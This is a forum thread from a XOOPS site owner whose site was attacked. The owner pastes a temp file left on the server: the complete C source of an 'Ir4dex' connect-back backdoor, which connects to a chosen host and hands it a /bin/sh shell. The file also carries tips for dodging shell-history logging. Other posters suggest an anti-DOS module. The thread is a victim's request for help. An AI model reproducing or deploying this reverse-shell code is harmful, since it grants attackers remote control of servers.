My XOOPS web site is down, because of classic DOS -space quota- attack

Web site is on Appache, Linux server...

I found this temp file on the server left by attacker, may be it could give you more info:

" #include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
int main(int argc, char **argv) {
char *host;
int port = 80;
int f;
int l;
int sock;
struct in_addr ia;
struct sockaddr_in sin, from;
struct hostent *he;
char msg[ ] = "Bem Vindo Creative_MX Let's Hack\n\n"
"Issue \"export TERM=xterm; exec bash -i\"\n"
"For More Reliable Shell.\n"
"Issue \"unset HISTFILE; unset SAVEHIST\"\n"
"For Not Getting Logged.\n(;\n\n";
printf("Ir4dex Connect Back Backdoor\n\n");
if (argc < 2 || argc > 3) {
printf("Usage: %s [Host] <port>\n", argv[0]);
return 1;
}
printf("[*] Dumping Arguments\n");
l = strlen(argv[1]);
if (l <= 0) {
printf("[-] Invalid Host Name\n");
return 1;
}
if (!(host = (char *) malloc(l))) {
printf("[-] Unable to Allocate Memory\n");
return 1;
}
strncpy(host, argv[1], l);
if (argc == 3) {
port = atoi(argv[2]);
if (port <= 0 || port > 65535) {
printf("[-] Invalid Port Number\n");
return 1;
}
}
printf("[*] Resolvendo Nome Do Host\n");
he = gethostbyname(host);
if (he) {
memcpy(&ia.s_addr, he->h_addr, 4);
} else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
printf("[-] Unable to Resolve: %s\n", host);
return 1;
}
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = ia.s_addr;
sin.sin_port = htons(port);
printf("[*] Conectando...\n");
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Socket Error\n");
return 1;
}
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
printf("[-] Unable to Connect\n");
return 1;
}
printf("[*] Spawning Shell\n");
f = fork( );
if (f < 0) {
printf("[-] Unable to Fork\n");
return 1;
} else if (!f) {
write(sock, msg, sizeof(msg));
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl("/bin/sh", "shell", NULL);
close(sock);
return 0;
}
printf("[*] Conectado\n\n");
return 0;
} "


Does anybody know a quick fix for this? Please!

There is an anti-DOS attack module.

I don't know if it will help in your case, but it may be worth a shot.
https://xoops.org/modules/mydownloads/singlefile.php?cid=24&lid=483

Thanks Suns

I will install this module for the future protection. I should do it before. Because it's third time that somebody did a damage to my site. I really don't know why. It seems that this time the attack is more serious than before...I fixed one thing, but found the other...

Thanks again.

The site is ok now, or for now.